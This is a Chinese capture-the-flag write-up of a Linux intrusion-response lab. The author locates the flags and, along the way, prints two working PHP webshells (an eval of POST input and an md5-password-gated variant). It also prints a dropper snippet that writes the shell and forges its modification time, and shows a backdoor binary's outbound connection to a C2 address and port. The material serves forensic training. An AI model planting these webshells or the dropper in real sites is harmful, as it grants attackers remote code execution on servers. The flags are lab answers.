第一章 应急响应-Linux入侵排查

1.web目录存在木马，请找到木马的密码提交

# 进入/var/www/html目录发现1.php,内容如下
<?php eval($_POST[1]);?>

flag{1}

2.服务器疑似存在不死马，请找到不死马的密码提交

# 找了半天实在是没看出来哪有什么不死马, 看了别人写的wp说.shell.php是不死马, 我实在还是觉得有点牵强, 这也能算不死马
# 其内容如下:
<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>

flag{hello}

3.不死马是通过哪个文件生成的，请提交文件名

# 生成.shell.php的文件大概率会包含.shell.php的关键字, 因为需要把内容写入这个文件名的文件, 从index.php中找到了代码片段
$file = '/var/www/html/.shell.php';
$code = '<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>';
file_put_contents($file, $code);
system('touch -m -d "2021-01-01 00:00:01" .shell.php');
usleep(3000);
# 这我看了确认确实不能算不死马

flag{index.php}

4.黑客留下了木马文件，请找出黑客的服务器ip提交

# 木马文件很明显为shell(1).elf, 先查看其进程PID
➜  ps -aux | grep "shell(1).elf"
root       891  0.0  0.0   6148   888 pts/1    S+   04:04   0:00 grep shell(1).elf
# 然后查看891进程对应的网络连接情况, 但是结果为空了
➜  netstat -ano | grep 891
# 直接下载下来拖进微步云沙箱, 得到外联ip

flag{10.11.55.21}

5.黑客留下了木马文件，请找出黑客服务器开启的监端口提交

# 因为在第4问拿微步云沙箱没看出来黑客服务器开启的监听端口, 然后我找了半天历史的tcp连接记录也没找到, 看了别人的wp
# 发现要先执行, 这说实话还是有点牵强, 不是沙箱谁敢执行....正常操作应该是把文件打包下来在沙箱环境进行二进制样本分析。
# 但是反正是靶机环境, 就直接执行了
➜  cd /var/www/html
➜  ls
 1.php   admin     config.php   favicon.ico   index.php     LICENSE    README.md  'shell(1).elf'   template
 1.tar   api.php   data         include       install.php   pictures   rss.php     sitemap.php     wap
➜  chmod +x shell\(1\).elf
➜  ./shell\(1\).elf
# 然后新起一个终端查看网路连接情况
➜  ss -nt
State           Recv-Q        Send-Q               Local Address:Port                Peer Address:Port
ESTAB           0             36                       10.0.10.3:22                   113.57.8.68:38072
SYN-SENT        0             1                        10.0.10.3:37552                10.11.55.21:3333

flag{3333}